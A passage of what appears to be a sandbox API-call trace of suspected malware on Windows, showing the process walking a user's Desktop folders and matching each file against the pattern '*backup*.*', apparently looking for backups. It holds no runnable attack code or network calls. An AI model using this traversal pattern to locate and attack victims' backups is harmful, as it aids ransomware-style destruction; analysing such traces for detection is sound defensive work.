lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b70 [0110.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e80 [0110.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970e80, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.887] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*backup*.*") returned 0 [0110.887] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.887] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.887] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.887] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.887] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.887] lstrcatW (in: lpString1="\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="\\KTOu\\LQQ8KQ8OZpD-.wav") returned="\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea818 [0110.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x38ea818, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f20 [0110.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970f20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.887] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*backup*.*") returned 0 [0110.887] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.887] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.887] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.888] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.888] lstrcatW (in: lpString1="\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2=".") returned 1 [0110.888] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2="..") returned 1 [0110.888] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*" [0110.888] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743260 [0110.888] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.888] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\." [0110.888] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.888] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\.") returned="\\KTOu\\UQEQQujqhNYM\\." [0110.888] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.888] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.888] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.." [0110.888] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.888] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.888] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\..") returned="\\KTOu\\UQEQQujqhNYM\\.." [0110.888] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.888] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.889] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.889] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.889] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.889] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.889] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.889] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.889] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.889] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2d68 [0110.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x29a2d68, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.889] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.889] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e20 [0110.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970e20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.889] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.889] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*backup*.*") returned 0 [0110.889] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.889] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.889] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.889] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.889] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.889] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.889] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2b70 [0110.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a2b70, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ba0 [0110.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970ba0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.890] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*backup*.*") returned 0 [0110.890] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.890] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.890] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.890] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.890] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.890] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.890] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2df8 [0110.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2df8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c60 [0110.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970c60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.890] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.890] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*backup*.*") returned 0 [0110.890] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.891] FindClose (in: hFindFile=0x743260 | out: hFindFile=0x743260) returned 1 [0110.891] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.891] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea8d8 [0110.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x38ea8d8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.891] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28a0 [0110.891] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea8d8 | out: hHeap=0x29a0000) returned 1 [0110.891] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.891] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f20 [0110.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970f20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.891] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.891] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0110.891] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*backup*.*") returned 0 [0110.891] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.891] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28a0 | out: hHeap=0x29a0000) returned 1 [0110.891] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.891] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.891] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.891] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.891] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.891] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.891] lstrcatW (in: lpString1="\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2=".") returned 1 [0110.892] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2="..") returned 1 [0110.892] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\*.*" | out: 